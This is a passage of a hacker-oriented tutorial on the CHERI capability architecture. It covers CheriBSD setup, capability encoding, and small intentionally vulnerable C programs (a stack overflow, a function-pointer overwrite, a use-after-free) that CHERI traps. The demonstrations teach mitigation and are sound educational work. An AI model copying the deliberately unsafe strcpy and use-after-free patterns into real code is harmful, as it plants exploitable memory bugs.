|=-----------------------------------------------------------------------=| |=--------------=[ 4 - A Hacker's Introduction to CHERI ]=---------------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ xcellerator ]=----------------------------=| |=-----------------------------------------------------------------------=| ## Introduction For many years, there have been attempts to address the issue of "weird machines" in the context of exploitation at "the source". People have always disagreed on what "the source" of the problem is, and therefore have approached the issue from various angles. For this reason, we have ended up with a great many solutions that all work in different ways and with different levels of efficacy. One of the newer and more unusual approaches has been coming out of Cambridge University in the UK for a few years now, and is named CHERI. The acronym itself stands for "Capability Hardware Enhanced RISC Instructions", which doesn't do a whole lot to explain *what* CHERI actually is or how it could affect binary exploitation. The goal of this article is to introduce CHERI from a hacker's perspective by trying to understand why it exists in the first place, and how it can (or perhaps will?) affect binary exploitation in the future. Coming from academia, the CHERI project naturally uses a lot of academic language that is sometimes tricky to parse or equate to things that the modern day hacker is more familiar with. Hopefully by the end of this article, you'll be able to do your own research on CHERI and even experiment with compiling and executing CHERI code, all the while relating what you're reading to existing concepts that you're likely already comfortable with. A good thing to address from the outset is "why should you care?". We're certainly used to thinking about computers at very low levels as exploit developers, and even digging into clever hardware features like MTE or CET. However, the central feature that this article is going to spend its time on, the "capability", isn't even available in any commercial hardware yet, and certainly isn't likely to pop up in your average xdev's path on their way to root in the immediate future. And yet, I'm telling you that you *should* care about capability computing, and not just because its cool. Even if tomorrow we all decided that the only code anyone would write has to be memory-safe, it still wouldn't address the hundreds of billions of lines of code out there that isn't (and that's probably a low-ball estimate). If anything is going to save us, the solution is going to have to work *with* all that code and not just require rewriting it all. CHERI is the closest thing I've seen to addressing this problem. If all of that doesn't convince you to read on, then maybe consider the challenge of trying to overcome yet another clever mitigation. To begin with, let's think about the problem that CHERI is trying to solve. "Exploitation" is too broad a term, and academics like to be specific with the problems that they fixate on. When you think about it - "weird machines" in the sense of modern binary exploitation, are a kind of miracle. If we reflect back on Turing's vision of a machine that processes an infinite tape using a set of fixed instructions, there's a hard distinction between the concept of "data" and "instructions" - the data being the tape, and the instructions (or "code") being integral to the machine. However, it wasn't long before Turing proposed the idea of the "universal Turing machine" which could effectively be "programmed" by the tape - in effect incorporating new instructions from the data that were a part of the machine's input. With this stroke, the lines between code and data were blurred - and we're still paying for it all these years later. There were attempts to make the situation more rigorous, and we ended up with the notions of "von Neumann" and "Harvard" architectures; the former being what most of us are used to in our day-to-day lives where code and data all live in the same memory, as opposed to the latter where code and data are fundamentally different and don't as easily intermingle. If you are writing a binary exploit for *almost* any target today then you're most likely, either directly or indirectly, dealing with *pointers*. This may seem like a rather obvious thing to point out (pun intended), but its crucial to the motivation for CHERI. If we're not leaking pointers to bypass ASLR, we might be overflowing an index that will be added to one to achieve an out-of-bounds read/write, or maybe we're even bringing our own pointers to the table as part of the exploit. What if we could re-design the architecture that our ISAs are built upon to firm up the notion of a pointer into something more concrete, or (dare we say) *safer*? Can we do pointers, but better? The major upside of moving protections from the language and into the ISA is that we can continue to use our existing C/C++ codebases without having to rewrite 40+ years of software in a memory-safe language. One thing that might come to mind is that we could demand that a pointer only being valid within a certain bound. Imagine if, encoded into the pointer itself, was a range for which that pointer could be used. If we could do that, could we also tack on some permissions bits? "This pointer can be used to read/write data from 0x80000000 to 0x80001000, but not to fetch instructions". Fundamentally, this is what the CHERI project refers to as a "capability" and is responsible for the "C" in the acronym. All the security guarantees espoused by the project centre around capabilities and how their use is enforced and abuse is prevented. The idea of the capability is actually a fairly old one in the history of computing. As far back as 1978, IBM had the System/38 minicomputer which supported a kind of capability addressing termed "authorized pointers". These pointers could only be created by privileged instructions and encoded their permissions into themselves. Unfortunately, there wasn't a way to modify these objects once they were created which led to some unfortunate issues where permissions couldn't be revoked once given. The System/38 was retired in 1988. Despite this, and a few other attempts over the years, capabilities haven't really taken off. The difference with CHERI is that instead of creating a bespoke new architecture, the team at Cambridge is attempting to "enhance" existing ISAs with capability addressing. At this point, you may well be thinking that turning pointers into pointer/ metadata hybrids isn't that much of a big deal if you can still "bring your own pointers" to an exploit. Surely you could just overwrite some capability in memory with a capability of your own that says "This pointer can be used to read/write/fetch to and from anywhere"? In order for this idea to have any legs, we need to also prevent capabilities from being forged. To explain this further, lets solidify our notion of capabilities a bit so that we know what it is that we're trying to prevent from being forged or manipulated. Let's assume we have a 64-bit system, say Aarch64. All our registers (where pointers must go to be dereferenced) are 64-bits wide, so we'll need to widen them a bit to support the extra metadata that we want to cram in. CHERI does this by simply doubling the register width so now our registers are 128-bits instead. Note that the ALU is untouched, so you don't get 128-bit integers and can't do 128-bit logical or arithmetical operations natively with this change. We can make our lives a little easier by also demanding that every capability is 128-bit aligned in memory. This is important because it means that *every contiguous 128-bit region of memory could be a capability*. Then again, it might not be so we need to devise a way to keep track of which of these regions are capabilities and which aren't. The simplest (for some definition of "simple") solution is to offload this responsibility to the memory controller. We make the demand that the memory controller maintain a state which governs where all the valid capabilities currently are in memory. When the CPU reads from memory into a register, it will also be told whether that read was a capability or not. If an attempt is made to dereference a value stored in a register, and this "tag" bit isn't set, then the CPU will trigger an exception. Also - and this is very important - whenever a write to memory is performed, the memory controller *must* clear the associated tag bit for that region, unless the CPU explicitly asks the memory controller to set the tag bit again afterwards, for instance when a legitimate capability is created. This means that any attempt to modify a capability in memory will clear the tag bit so that a CPU exception will trigger if the program tries to later dereference that capability. Woah, woah, woah slow down. There's a lot to unpack here and several questions should hopefully be raised in your head. First of all, how on Earth is the CPU supposed to tell the memory controller what is a legitimate capability modification? There are plenty of programs that will perform pointer arithmetic, and wasn't the whole point of this thought exercise to devise a way to limit the viability of exploitation without having to rewrite 50+ years of software? And while we're at it, where are these tag bits supposed to be kept anyway? The answer to the first of these questions is *reasonably* straightforward, and the clue is once again in the CHERI acronym: Capability Hardware Enhanced RISC-V *Instructions*. The instruction set itself for our target ISAs are augmented to support all these CHERI protections that we've been discussing. This is a crucial point - you may not have to rewrite your software to support CHERI, but you will need to recompile it with a CHERI- aware compiler. The various CHERI specifications allow for a CHERI-aware CPU to have it's CHERI protections switched on-and-off, meaning that you can run "legacy" (read: "non-CHERI") code alongside CHERI instructions. This means that you could have a CHERI-hardened kernel alongside some core system utilities, but still run programs that use the standard ISA (or even vice-versa: a legacy kernel but have userland applications make use of CHERI). We'll come back to these instructions and how they work a little later. As far as the second question goes, there are a couple of options we could take. The simplest (there goes that word again) is to let the memory controller use something it's already got lots of: memory. A small pocket of memory can be reserved that isn't addressable at all (and therefore completely invisible to any code running on the CPU) which can be used to store a single bit for every 128-bit region of memory. If the bit is set, then the corresponding region contains a capability, and if the bit is cleared, then the memory just contains data. While fairly straightforward, this approach can create issues with memory latency due to the controller having to check the tag bits (which necessarily live in different DRAM rows) for *every* access. Therefore another proposed solution is to make use of the additional bits present in ECC RAM. The precise method employed to store the tag bits doesn't matter a whole lot to the would-be CHERI exploit-writer, we just have to keep in mind that we are in all likelihood unable to touch those bits. So, let's take a bit of a review because we've covered a lot of ground already. Under CHERI, pointers have been replaced by capabilities and the memory controller is doing a lot of extra work to keep track of where capabilities are in RAM, as well as turning capabilities into regular ol' data as soon as they're modified in any unsanctioned or unexpected way. And to top it all off, we've got some extra instructions to play with to support all of this. Don't forget that registers are also now twice as wide as they used to be. What do we even call this model of computing? It's not quite von Neumann because code and data aren't completely interchangeable anymore (pointers aren't really code, but they're also not really data either anymore). It's also not quite Harvard either because code and data still live together side-by-side. We're somewhere in the middle. Personally I feel like we're still closest in spirit to von Neumann computing, but there's definitely a few shades of grey now. Congratulations - there's the theory out of the way. Let's get down to some solid examples of how CHERI works and how it could make our lives harder as exploit-writers. ## Building and running CheriBSD for Morello One of the early specifications of CHERI for an ISA was for Aarch64, which has been dubbed by Arm as "Morello" [1,2]. Physical hardware apparently does exist, but it's in a developmental stage and seemingly very difficult to get your hands on. The CHERI team in Cambridge have produced a modified version of QEMU to support all the CHERI functionality, as well as a fork of LLVM that can emit CHERI instructions. They've also bundled all of this up into a git repo that lets you easily build everything you need to get a "CheriBSD" VM running. When building all of this, we have two options to choose from: whether to allow legacy non-CHERI instructions into the mix, called "hybrid" mode, or to only allow CHERI instructions to be executed in our VM, which is referred to as "purecap" mode (short for "pure- capability"). Seeing as this is an article all about CHERI and how it could affect the writers of binary exploits, let's stick with purecap mode to make sure we're getting the full effect. This means that the CheriBSD kernel and userland will be built with CHERI Aarch64 instructions. To start with, head over to the CHERIBuild GitHub repo [3], install any of the OS-specific dependencies you need and clone the repo somewhere. There are a few things that we need to build, so it might take a while. To get started, run the following (in order):
./cheribuild.py qemu --include-dependencies
./cheribuild.py cheribsd-morello-purecap --include-dependencies
./cheribuild.py gdb-morello-hybrid-for-purecap-rootfs \
--include-dependencies
./cheribuild.py disk-image-morello-purecap --include-dependencies
Now we have a bootable disk image for CheriBSD that includes gdb. If you have any SSH public keys in your `~/.ssh`, when `cheribuild.py` creates the disk image, it should prompt you if you want to automatically copy them into `authorized_keys` in the CheriBSD image. This is a good idea because it means we'll be able to SSH into the Cheri VM, which will give us a nicer environment than the QEMU console, as well as letting us use SCP to copy our cross-compiled executables over. Finally, at long last we can boot CheriBSD under QEMU:
./cheribuild.py run-morello-purecap
It will take a little while to boot, but once we're in (username "root",no password), we can see that for the most part it looks and feels exactly like regular FreeBSD. Here are a few things to note: * If you want to shutdown the VM, the keyboard shortcut to kill a QEMU console session is `Ctrl+a; x`. * CheriBSD should have automatically spawned an SSH server for us which QEMU should have port forwarded to 10005 for us. If you copied your keys into the CheriBSD rootfs during the `disk-image-morello-purecap` step, you should be able to just `ssh -p 10005 root@localhost` from your host. ## Compiling programs for CheriBSD Let's set ourselves up so that we can easily compile simple programs to start probing how CHERI works. The current CHERI buildsystem is a bit convoluted (e.g. going through `cheribuild.py`) but we're only going to write a few short C programs that don't need all the heavy lifting that provides. If you *do* want to explore more complex programs, then I suggest you dive into how `cheribuild.py` works, but that's beyond the scope of this article. It's worth pointing out that several open source projects can already be built such as FFmpeg, Nginx, or even the Plasma desktop with Wayland. After running all the commands above, you'll have a `~/cheri` directory with all the artifacts of the build. Staying in the `cheribuild` directory, we'll create a folder called `vuln` where we'll store our intentionally vulnerable programs. We'll *also* create a `vuln` folder in the CheriBSD VM to keep things tidy. Create a bash script called `build.sh` in your *HOST'S* `vuln` folder (i.e. under `cheribuild/`) with the following contents:
#!/bin/sh
if [ "$#" -ne 2 ]; then
echo "Usage: $0 input.c output"
exit 1;
fi
~/cheri/output/morello-sdk/bin/clang \
-target aarch64-unknown-freebsd13 \
--sysroot=$HOME/cheri/output/rootfs-morello-purecap \
-B $HOME/cheri/output/morello-sdk/bin \
-mcpu=rainier \
-march=morello \
-mapi=purecap \
-Xclang -morello-vararg=new \
-Xclang -morello-bounded-memargs \
-Wall \
-Wcheri \
-g \
-fuse-ld=lld \
-o $2 \
$1 &&
scp -P 10005 $2 root@localhost:vuln/$2
Now we can write C programs on our host system and compile/upload them with `./build.sh input.c output`! Let's crack on and explore CHERI... ## Capability Encoding At this point, for our own understanding we should probably take a quick look at what is contained in these extra bits of CHERI registers. The precise encoding format for each CHERI-supported architecture varies a little, but largely includes the same information. Note that whenever we need to dissect a capability for its metadata, it's MUCH easier to just rely on either GDB or the handy `%#p` format-specifier (more on that shortly) to format it for us. But we're exploit developers, so we should still have a solid understanding of how things work even if we'll end up making the computer do the hard work for us. For Morello, a capability register is defined as [3; Section 2.5]: <- Bit 128 Bit 0 -> +-+--------+--------+----------------+-----+------------------------------+ |T| Permi- | Object | Bounds |Flags| Bounds | | | ssions | Type | (Upper) | | (Lower) | +-+--------+--------+----------------+-----+------------------------------+ |T| Permi- | Object | Bounds |Flags| Value | | | ssions | Type | (Upper) | | | +-+--------+--------+----------------+-----+------------------------------+ * First comes the `T` bit which is the "tag bit" that we were talking about earlier. This is the bit that indicates whether value in the register is a valid capability or not. The architecture specifies that this bit isn't actually loadable in the normal sense (being bit 128, it's really the 129th bit yet we can only load 128-bits into a register), but instead comes from the corresponding tag bit that the memory controller is responsible for providing during loads/stores. This bit CAN be set by the CPU using special instructions, for example when a new capability is being created intentionally. * Next up are the "Permissions" bits, of which there are 18 defined. The format is as follows: +-----+------------------+------------------------------------------------+ | Bit | Permission | Meaning | +-----+------------------+------------------------------------------------+ | 17 | Load | Can load bytes from memory | | 16 | Store | Can store bytes into memory | | 15 | Execute | Can fetch instructions from memory | | 14 | LoadCap | Can load a capability to a register | | 13 | StoreCap | Can store a capability from a register | | 12 | StoreLocalCap | Can store a "local" (see "Global" below) | | | | capability from a register | | 11 | Seal | Can "seal" an unsealed capability | | 10 | Unseal | Can "unseal" a sealed capability | | 9 | System | Can access system registers | | 8 | BranchSealedPair | Can be used by a "branch sealed pair" | | | | instruction | | 7 | CompartmentID | Indicates that this capability is a | | | | "compartment" ID | | 6 | MutableLoad | Loading a capability using a capability without| | | | this bit will clear the Store* and MutableLoad | | | | permissions | | 5-2 | User[3:0] | Software-defined | | 1 | Executive | Indicates an instruction fetch executes in | | | | executive vs restrictive mode (visibility of | | | | global registers) | | 0 | Global | Indicates whether this capability is local/ | | | | global | +-----+------------------+------------------------------------------------+ There are a couple of terms in the above table that we haven't covered yet (and some we won't cover). Don't worry too much for now, if we don't cover it in this article, by the time you reach the end, you'll be able to go and research into them further. * Following the permissions is the "ObjectType" (15 bits) which indicates whether and how a capability is "sealed". A sealed capability is one that is valid (i.e. it is recognised as a capability), but is not allowed to be used (apart from being unsealed). This is useful, for example, when passing capabilities between different contexts or threads. The use of sealed capabilities is important in "CHERI compartmentalisation". Associating an ObjectType with a sealed capability allows for finer granularity in identifying sealed capabilities with "types". * The encoding of the "Bounds" field is pretty complex. If you want to read up on it yourself, you can [3; Section 2.5.1], but for the purposes of this article, suffice to say that the bounds field potentially takes up 87 bits and overlaps with the value and flags fields. Determining the bounds of a capability depends on the context. * The "Flags" field is just 8 bits and is up to the user to device if and how to use. There are CHERI instructions like `BICFLG` for Aarch64 (bit- wise clear immediate on flags) for operating directly on this field without clearing the tag bit. * Lastly, the "Value" field comprises the lower 64 bits of the capability. As the name indicates, this is the actual value that we think of numerically being stored in the register. It could be an integer (in the case where we have data rather than a capability) or a memory address (in the event where we DO have a capability). This all may seem like a lot but, as you'll see in our examples, we really don't need to spend any time decoding capabilities manually, and any information that we *do* need is very easy to extract. ## Vulnerable Programs ### A Simple Stack Buffer Overflow Let's start by trying to exploit the canonical stack buffer overflow, we'll call it `stack.c`:
#include <stdio.h>
#include <string.h>
void __attribute__((noinline)) overflow(char* src) {
char buffer[16];
printf("buffer @ %#p\n", (char*)&buffer);
strcpy(buffer, src);
}
int main(int argc, char** argv) {
if (argc >= 2) {
printf("Calling overflow()\n");
overflow(argv[1]);
printf("Returned from overflow()\n");
}
return 0;
}
Two things to notice briefly: * We use the `noinline` attribute on `overflow()` to prevent Clang from optimising out the function call. * When we print `&buffer` (which is a CAPABILITY), we use the `%#p` format specifier. This is specific to the CHERI SDK and will print the metadata about the capability in a pretty way. We can compile and upload this with: `./build.sh stack.c stack`. Over in the VM, we should now have a `~/vuln/stack` binary waiting for us. The program itself should be fairly obvious - passing an argument of more than 16 bytes will overflow the `buffer` array in the `overflow()` function... *or will it?*. Let's run it and see what happens!
root@cheribsd-morello-purecap:~/vuln # ./stack 01234
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Returned from overflow()
Let's dissect this as it's our first actual capability:
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
| | |
| | +---------> The range that the capability is
| | valid for.
| |
| +--------------> The permissions: lower-case are
| for data, upper-case for
| capabilities.
|
+------------------------------> The "pointer"-component.
So, we can see that `&buffer` is bounded to only be able to access bytes in the range `0xfffffff7fef0-0xfffffff7ff00`, which matches the size of the `buffer` array in our program: 16 bytes. Furthermore, this capability can be used to read and write both data and capabilities from this range, but notably it *cannot fetch instructions*. Let's see what happens if we try to run the program again, but supply it enough bytes to overflow `buffer`:
root@cheribsd-morello-purecap:~/vuln # ./stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
In-address space security exception (core dumped)
Hmm, okay - we crashed. Not entirely unexpected, but let's find out why. Fortunately we built GDB for CheriBSD so we can take a look at the coredump that got generated.
root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack stack.core
Reading symbols from ./stack...
[New LWP 100085]
Core was generated by `./stack 0123456789abcdef'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability bounds fault.
#0 0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
0xfffffff7ff00] "\210\375\367\277\377\377", from=<optimized out>)
at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48
As we may have guessed, our call to `strcpy()` triggered a CHERI exception, and that's why the kernel killed our process. We can disassemble the `overflow` function in GDB to get a closer look at the CHERI-augmented Aarch64 instructions. However, it's probably easier for us to do this analysis outside of CheriBSD. Fortunately, when we built the Morello SDK, a version of binutils was compiled with Aarch64 CHERI support which lives in `~/cheri/output/morello-sdk/bin/`. If you prefer to disassemble your compiled binaries outside of the VM, then `objdump` in this directory will work as expected. Alternatively, you can just `disas overflow` in GDB if you prefer.
00000000000108e0 <overflow>:
108e0: 028183ff sub csp, csp, #96
108e4: 42827bfd stp c29, c30, [csp, #64]
108e8: 020103fd add c29, csp, #64
108ec: 020083e1 add c1, csp, #32
108f0: c2c83821 scbnds c1, c1, #16 // =16
108f4: c20007e1 str c1, [csp, #16]
108f8: a21f03a0 stur c0, [c29, #-16]
108fc: c2c1d3e0 mov c0, csp
10900: c2000001 str c1, [c0, #0]
10904: c2c83809 scbnds c9, c0, #16 // =16
10908: 90800080 adrp c0, 0x20000 <main+0x18>
1090c: c2428400 ldr c0, [c0, #2576]
10910: 94000034 bl 0x109e0 <printf@plt>
10914: c24007e0 ldr c0, [csp, #16]
10918: a25f03a1 ldur c1, [c29, #-16]
1091c: 94000035 bl 0x109f0 <strcpy@plt>
10920: 42c27bfd ldp c29, c30, [csp, #64]
10924: 020183ff add csp, csp, #96
10928: c2c253c0 ret c30
1092c: d503201f nop
Now, even if your somewhat familiar with Aarch64 assembly, this probably looks quite strange to you. Not to worry - this really is Aarch64 assembly, but just has a few extras added on. Seeing as this is our first crash in CHERI code, let's walk through what's going on. The first four instructions in the prologue to `overflow()` at first appear to be pretty familiar; namely `sub`, `stp` and two `add`s. However, upon closer inspection we see that the registers in these instructions aren't the familiar Aarch64 ones. Instead, they've been replaced by `c`-variants, which are the CHERI-ised double-width versions that we've already talked about. As you might expect, `csp` is the "CHERI stack pointer" and `c1`, `c29`, `c30`, etc are just CHERI versions of `x1`, `x29`, `x30`, and so on. The CHERI forms of most of the usual Aarch64 instructions continue to behave in the natural way: `add c29, csp, #64` will add the immediate `64` to `csp` and store the result in `c29`. Remember that the ALU still only works with 64-bit integers, so the capability metadata part of the registers isn't included in the addition. However, the CPU will automatically preserve the tag bit when necessary (for example when a program intentionally performs pointer arithmetic on a capability). This is an important point to keep in mind - manipulation of capabilities that are already in registers *doesn't clear the tag bit*. Then, at `0x108f0` we encounter our first truly CHERI-unique instruction: `scbnds c1, c1, #16`. The SCBNDS mnemonic is short for "Set CHERI Bounds" and with that knowledge you can maybe guess that this instruction sets the capability bounds on register `c1` (which is computed as a 32-byte offset from the stack pointer `csp` in the instruction just prior) to the immediate `16`. In the context of our program, that makes perfect sense: in `overflow()` we declared an array of `char`s called `buffer` on the stack to be exactly `16` bytes in size. All in all, the `buffer` capability ends up being stored in register `c1` after the instruction at `0x108f0` executes. And with that, the rest of the disassembly of `overflow()` should largely make more sense now! Just remember that for most instructions, there's nothing particularly strange about the `c`-registers as the only thing that matters is the "value" field. We only need to really consider the capability nature of the values stored in registers when doing memory operations. Taking a closer look at the crashed `stack` program in GDB we can better understand what goes wrong:
root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack --args stack 0123456789abcdef
Reading symbols from stack...
(gdb) r
Starting program: /root/vuln/stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Program received signal SIGPROT, CHERI protection violation.
Capability bounds fault.
0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
0xfffffff7ff00] "q\375\367\277\377\377", from=<optimized out>)
at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48
(gdb) x/i $pcc
=> 0x4037c7f8 <strcpy+24>: strb w8, [c2], #1
(gdb) i r w8 c2
w8 0x0 0
c2 0xdc5d40007f00fef00000fffffff7ff00 0xfffffff7ff00 [rwRW,
0xfffffff7fef0-0xfffffff7ff00]
We already knew to expect a crash in `strcpy()`, but looking at the exact instruction that caused the CHERI fault we see that it's a store of the byte `0x00` (the NULL byte at the end of the 16 character string we passed as the program argument) to the capability in `c2`. Examining that capability (which GDB helpfully expands for us) we see that the VALUE is `0xfffffff7ff00`, but the BOUNDS are `0xfffffff7fef0-0xfffffff7ff00`, i.e. we're trying to store a byte at the memory location that is just beyond the range that our capability permits us to access! ### Capability Overwrites We can perhaps be a little craftier in our vulnerable program. Instead of writing out-of-bounds, what if we intentionally write a program that let's us modify a pointer. While this program might look silly, I expect many people reading this have found themselves in a situation where their only primitive was being able to partially overwrite a pointer. I'm going to call this file `partial.c`.
#include <stdio.h>
#include <string.h>
void __attribute__((noinline)) some_func(void) {
printf("inside some_func()\n");
}
int main(int argc, char** argv) {
void (*func_ptr)(void) = &some_func;
if (argc >= 2) {
strcpy((char*)&func_ptr, argv[1]);
}
printf("Calling `func_ptr()` @ %#p\n", func_ptr);
func_ptr();
return 0;
}
Building this from our `vuln` directory with `./build.sh partial.c partial` and hopping back into the CheriBSD VM, we can start exploring. This time around, we'll explicitly keep our inputs small to avoid triggering an out- of-bounds write. The size of `func_ptr` itself will be 16 bytes (because it's a capability), so the capability `&func_ptr` that gets passed to `strcpy()` will have a bounds of 16 bytes. Therefore we should keep our inputs smaller than this to make sure we're exploring new functionality and not running into the same crash that we had with `stack`. Before diving straight in, let's think for a moment about what kind of crash we should expect based on our current understanding. As explained above, as long as we keep our inputs less than 16 bytes, we won't run into the same error as with `./stack`. In fact, we should expect that the call to `strcpy()` should return without any drama. However, the `strcpy()` isn't without its importance this time around because it will have written to a capability which we will then dereference by calling `func_ptr()` at the end of `main()`. If the memory controller is doing what it's supposed to, then it will have cleared the tag bit from the capability corresponding to `func_ptr` when `strcpy()` overwrites part of it. Okay, enough hypothesising - let's run this without an argument to see the `func_ptr` capability before it gets overwritten.
root@cheribsd-morello-purecap:~/vuln # ./partial
Calling `func_ptr()` @ 0x1108b1 [rxR,0x100000-0x130c80] (sentry)
inside some_func()
So the `func_ptr` capability has a value of `0x1108b1`, is valid for the bounds `0x00000-0x130c80` and can be used to both read and fetch bytes (the lower-case "rx") as well as read capabilities (the upper-case "R"). Now let's run `partial` again but this time with an argument:
root@cheribsd-morello-purecap:~/vuln # ./partial A
Calling `func_ptr()` @ 0x110041 [rxR,0x100000-0x130c80] (invalid,sentry)
In-address space security exception (core dumped)
Aha! Notice how the low bytes of the value field changed from `0xb108` to `0x4100` - the "A" (followed by a NUL) we passed as an argument successfully overwrote the capability, but the tag bit got cleared in the process. Notice how the `%#p` specifier helpfully adds the word "invalid" to the formatting of the `func_ptr` capability now. If we wanted to, we could overwrite the entirety of the `func_ptr` capability and STILL not be able to prevent the tag bit from being cleared. No matter what we do in this example, modifying the capability using user input, forces the capability to be treated as data. In summary, the CPU once again threw an exception at us, but this time it was ultimately because we tried to dereference the capability in `pcc` (remember - this is the CHERI version of `pc`) after the tag bit had been cleared. We were able to successfully return from `strcpy()` because we didn't overflow the bounds of the capability that was used to write to the `func_ptr` object. However, in doing so, the memory controller cleared the corresponding tag bit for the `func_ptr` capability, meaning that it was no longer valid! When we then tried to call `func_ptr()`, `pcc` still gets set to the now invalid capability, but as soon as the CPU tries to fetch an instruction from the address that `pcc` now points to, the exception gets thrown. Pretty cool, huh? Hopefully these two examples demonstrate how CHERI can help to mitigate two very common avenues of attack that academics refer to as "spatial memory safety issues". Here, "spatial" refers to the fact that we're modifying memory that we're not supposed to, "beyond the space/region that the program expects". At this point, it's worth mentioning something that's missing from this picture - if you've been following along at home you might have already noticed it. If you run the second example above a few times *without passing any argument*, you'll see the address of `some_func` printed out a few times. Notice anything strange? That's right - there's no ASLR on this system. The thought behind this appears to be that because you can't forge capabilities, why does the memory layout need to be randomised at all? Does knowing the virtual memory locations of *anything* help you anymore with regards to exploitation? Are information leaks still a concern (assuming you're only leaking capabilities)? If you know anything about academics, then you're probably suspecting that labeling something as "spatial memory safety" means that there's another type of memory safety to think about. In our case, we should also consider "temporal memory safety issues". These are vulnerabilities that occur when the contents of memory changes at different times in ways that the programmer didn't intend, and therefore the *program* doesn't expect. Think of things like use-after-free, or perhaps even type-confusion. Personally, I'm not a fan of categorising memory corruption issues into these two camps because I feel like there's too much grey area, but we'll proceed with it for now as it's what the CHERI literature uses. ### Use-After-Free If you've written a UAF exploit or similar in the past, then you'll know that exploits in this realm depend heavily on the allocator due to the objects of interest being on the heap (objects on the stack are typically more "permanent" so are drastically less likely to have their contents switched out from under the program's nose during execution). A CHERI system is no exception and temporal memory protections come from the use of a "CHERI-hardened" allocator [4]. The current research in this field describes an allocator that employs a concept referred to as "quarantining" to protect freed allocations from being reused. The idea of a quarantining allocator is reasonably straightforward: when a heap chunk is freed, it goes into a quarantine list where it cannot be re-allocated. Later, the quarantine list can be cleaned up by removing the tag bit from all the capabilities in the list before returning them to the pool of free chunks. In my view, I don't quite see why this idea of quarantining should be preferred over zeroing memory as part of the free operation as this would also have the added benefit of removing the tag bit from any capabilities that were contained *within* the allocation (for example, if a struct containing function pointers was allocated on the heap) and therefore preventing legitimate capabilities from possibly being re-used at a later time. Perhaps the reasoning is to do with memory latency again and the cost of zeroing arbitrarily large memory regions during `free()`. Let's see an example of the quarantining allocator in action:
#include <stdio.h>
#include <stdlib.h>
int main(void) {
void* ptr = NULL;
ptr = malloc(64);
printf("ptr @ %#p\n", ptr);
free(ptr);
ptr = malloc(64);
printf("ptr @ %#p\n", ptr);
free(ptr);
return 0;
}
On a non-CHERI system, we'd typically expect to see the same address printed each time for `ptr`, despite the fact that we've free'd and malloc'd in between the calls to `printf`. However, in our CheriBSD VM, we see:
root@cheribsd-morello-purecap:~/vuln # ./heap1
ptr @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040]
ptr @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080]
Notice how the `ptr` capability changes - in fact the second capability is always 64 bytes after the first. This is because, despite freeing `ptr`, the memory it pointed to has been quarantined. The next time we try to allocate something, we get the next free *non-quarantined* chunk which happens to be immediately after the first chunk that we got. How does any of this affect exploitation? Well, let's try to concoct a very simple use-after-free example to see if and how CHERI complains to us:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
char* ptr1 = malloc(64);
strcpy(ptr1, "CHERI1");
free(ptr1);
/* Leave this commented out for, we'll come back to it afterwards */
//malloc_revoke();
char* ptr2 = malloc(64);
strcpy(ptr2, "CHERI2");
free(ptr2);
printf("ptr1 @ %#p => %s\n", ptr1, ptr1);
printf("ptr2 @ %#p => %s\n", ptr2, ptr2);
return 0;
}
On a non-CHERI system, the behaviour of the above program depends on the allocator. On my host system, the addresses allocated for both `ptr1` and `ptr2` are the same, but contain junk data by the time `printf` is called. On a different system with a different allocator, the strings `CHERI1` and `CHERI2` might still be present. However, in the CheriBSD VM, we see:
root@cheribsd-morello-purecap:~/vuln # ./heap2
ptr1 @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] => CHERI1
ptr2 @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080] => CHERI2
In particular, notice how `ptr1` and `ptr2` DO NOT have the same value despite `ptr2` being allocated after `ptr1` was freed. This is the quarantining allocator at work again. Notice also that the `CHERI1` and `CHERI2` strings are still in place. This tells us that the call to `free()` *doesn't clear the tag bit from the pointers that are passed to it*. If we now uncomment the call to `malloc_revoke()` between the two allocations, we get a very different result:
root@cheribsd-morello-purecap:~/vuln # ./heap2
In-address space security exception (core dumped)
Uh, oh - something went wrong. Let's take a look in GDB to see what happened.
root@cheribsd-morello-purecap:~/vuln # gdb -q ./heap2 heap2.core
Reading symbols from ./heap2...
[New LWP 100064]
Core was generated by `./heap2'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability tag fault.
#0 strlen (str=0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] (invalid) "CHERI2")
at /home/user/cheri/cheribsd/lib/libc/string/strlen.c:143
So what did that `malloc_revoke()` function do? This is a function provided by the CHERI SDK that forces a cleanup of the quarantine list in the allocator. This means that the capability corresponding to `ptr1` has its tag bit cleared. From the CHERI man pages [5], `malloc_revoke()` "triggers a full flush of the quarantine and scan of memory to ensure that all references to memory previously quarantined by free(3) or realloc(3) are revoked upon successful return". Ultimately, we can see that `strlen()` was called (presumably by `printf()` due to the `%s` format specifier) with an invalid capability. ## Where next? I hope you've enjoyed this figurative toe-dip into CHERI both as a concept, and also after getting our hands dirty with some solid examples. Personally, I think the platform has some solid design ideas that will certainly make classic exploitation techniques harder. I'm hesitant to say that any of those existing techniques have been rendered obsolescent because, as far as I'm aware, CHERI is yet to be battle tested as a security mechanism on a target that's of significant interest to exploit developers; like a flagship smartphone or a games console. If you'd like to dive deeper into CHERI, then I recommend checking out the Morello documentation more closely [2]. There's also the "CHERI Exercises" repo on GitHub [6] by the CHERI team at Cambridge University which highlights more scenarios where CHERI introduces new complications for exploit writers. This article should give you a solid foundation to be able to tackle those exercises. Remember that CHERI doesn't stop at Morello with Aarch64! CHERI specifications also exist for MIPS and RISC-V, with 